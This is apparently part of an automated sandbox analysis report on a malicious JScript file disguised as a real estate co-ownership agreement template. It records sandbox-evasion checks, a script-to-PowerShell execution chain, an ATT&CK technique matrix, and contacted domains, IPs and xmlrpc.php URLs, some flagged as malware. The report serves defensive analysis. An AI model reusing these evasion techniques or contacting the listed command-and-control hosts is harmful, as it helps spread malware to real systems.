    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4421Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5524Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6140
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3519
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 4421 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 5524 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep count: 6140 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep count: 3519 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"Jump to behavior
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
    Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information12
    Scripting    		Valid Accounts1
    Windows Management Instrumentation    		12
    Scripting    		11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote ServicesData from Local System1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		1
    Scheduled Task/Job    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		11
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture14
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436909 Sample: real estate co ownership ag... Startdate: 06/05/2024 Architecture: WINDOWS Score: 92 29 weissenbach-pr.de 2->29 31 tennoji-law-uranai.com 2->31 33 2 other IPs or domains 2->33 43 Multi AV Scanner detection for domain / URL 2->43 45 Antivirus detection for URL or domain 2->45 47 Yara detected Html Dropper 2->47 49 Sigma detected: WScript or CScript Dropper 2->49 8 wscript.exe 1 1 2->8         started        11 wscript.exe 1 2->11         started        13 wscript.exe 2->13         started        signatures3 process4 signatures5 55 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->55 15 cscript.exe 1 1 8->15         started        57 JScript performs obfuscated calls to suspicious functions 11->57 59 Suspicious execution chain found 11->59 17 cscript.exe 1 13->17         started        process6 process7 19 powershell.exe 14 48 15->19         started        23 conhost.exe 15->23         started        25 powershell.exe 17->25         started        27 conhost.exe 17->27         started        dnsIp8 35 tennoji-law-uranai.com 153.127.91.146, 443, 49711, 49712 SAKURA-ASAKURAInternetIncJP Japan 19->35 37 naturalanimals.net 91.198.66.211, 443, 49708 NBISERV-ASDE unknown 19->37 39 weissenbach-pr.de 78.46.3.78, 443, 49709 HETZNER-ASDE Germany 19->39 51 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 19->51 53 Loading BitLocker PowerShell Module 19->53 41 memar98.com 195.28.10.122, 443, 49710 MHOSTIR unknown 25->41 signatures9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    weissenbach-pr.de11%VirustotalBrowse
    tennoji-law-uranai.com0%VirustotalBrowse
    memar98.com0%VirustotalBrowse
    naturalanimals.net0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://tennoji-law-uranai.com/xmlrpc.php0%Avira URL Cloudsafe
    https://weissenbach-pr.de/xmlrpc.php100%Avira URL Cloudmalware
    https://memar98.com/xmlrpc.php0%Avira URL Cloudsafe
    http://raphaeljs.com/analytics.js)0%Avira URL Cloudsafe
    https://naturalanimals.net/xmlrpc.php0%Avira URL Cloudsafe
    https://weissenbach-pr.de/xmlrpc.php11%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    weissenbach-pr.de
    		78.46.3.78
    		truefalseunknown
    tennoji-law-uranai.com
    		153.127.91.146
    		truefalseunknown
    memar98.com
    		195.28.10.122
    		truefalseunknown
    naturalanimals.net
    		91.198.66.211
    		truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://memar98.com/xmlrpc.phpfalse
    • Avira URL Cloud: safe
    		unknown
    https://naturalanimals.net/xmlrpc.phpfalse
    • Avira URL Cloud: safe
    		unknown
    https://tennoji-law-uranai.com/xmlrpc.phpfalse
    • Avira URL Cloud: safe
    		unknown
    https://weissenbach-pr.de/xmlrpc.phpfalse
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://raphaeljs.com/analytics.js)real estate co ownership agreement template 43632.jsfalse
    • Avira URL Cloud: safe
    		unknown
    https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/dreal estate co ownership agreement template 43632.jsfalse
      		high
      https://github.com/nhn/tui.chartreal estate co ownership agreement template 43632.jsfalse
        		high
        http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animatingreal estate co ownership agreement template 43632.jsfalse
          		high
          https://www.win.tue.nl/~vanwijk/stm.pdfreal estate co ownership agreement template 43632.jsfalse
            		high
